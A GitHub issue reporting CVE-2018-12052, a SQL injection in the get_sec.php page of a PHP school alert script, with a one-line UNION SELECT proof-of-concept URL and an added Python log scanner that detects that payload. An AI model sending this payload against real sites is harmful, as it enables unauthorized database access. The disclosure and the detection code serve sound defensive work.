unh3x / just4cve


[CVE-2018-12052] Schools Alert Management Script get_sec.php SQL Injection #3

Open unh3x opened 6 years ago

unh3x commented 6 years ago

================= Schools Alert Management Script - get_sec.php SQL Injection

Date: 07.06.2018
Vendor Homepage: https://www.phpscriptsmall.com/
Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
Category: Web Application
Exploit Author: M3@pandas From DBAppSecurity
Tested on: Linux Mint
CVE: CVE-2018-12052

================= Vulnerable cgi:

get_sec.php?q=[sqli]

================= Proof of Concept:

/get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/(user(),0x7e7e,database(),0x7e7e,@@version)%23

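A defender-side check for the request in the report above, added here as an example and not part of the original report or the vendor's code: it scans web access logs for `get_sec.php` requests whose `q` parameter contains UNION SELECT once MySQL versioned comments (`/*!50000...*/`) are unwrapped. The combined-log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# MySQL runs the body of /*!NNNNN ... */ as SQL when the server version is at
# least NNNNN, so a keyword wrapped this way is live code, not a comment.
VERSIONED = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b")
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Unwrap versioned comments, drop ordinary ones, fold case and spacing."""
    value = VERSIONED.sub(r" \1 ", value)
    value = COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()

def scan(log_lines):
    """Return (line_number, normalized q) for get_sec.php requests whose q
    parameter contains UNION ... SELECT after normalization."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/get_sec.php"):
            continue
        # parse_qs percent-decodes the value and turns '+' into a space
        for raw in parse_qs(url.query).get("q", []):
            norm = normalize(raw)
            if UNION_SELECT.search(norm):
                hits.append((number, norm))
    return hits

# Constructed access-log lines; line 2 carries the request from the report above.
SAMPLE_LOG = r'''
198.51.100.7 - - [07/Jun/2018:10:00:00 +0000] "GET /get_sec.php?q=3 HTTP/1.1" 200 187
203.0.113.5 - - [07/Jun/2018:10:00:01 +0000] "GET /get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/(user(),0x7e7e,database(),0x7e7e,@@version)%23 HTTP/1.1" 200 512
198.51.100.7 - - [07/Jun/2018:10:00:02 +0000] "GET /news.php?q=student+union+select+committee HTTP/1.1" 200 944
'''.strip().splitlines()

if __name__ == "__main__":
    for number, norm in scan(SAMPLE_LOG):
        print(f"line {number}: {norm}")
```

A plain substring match for `union select` on the raw log line misses this request, because the keyword is percent/plus-encoded and wrapped in a versioned comment; the match only succeeds after decoding and unwrapping.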

xunyang1 commented 2 years ago

Hello, do you still have the source code? The code in the repo has been deleted.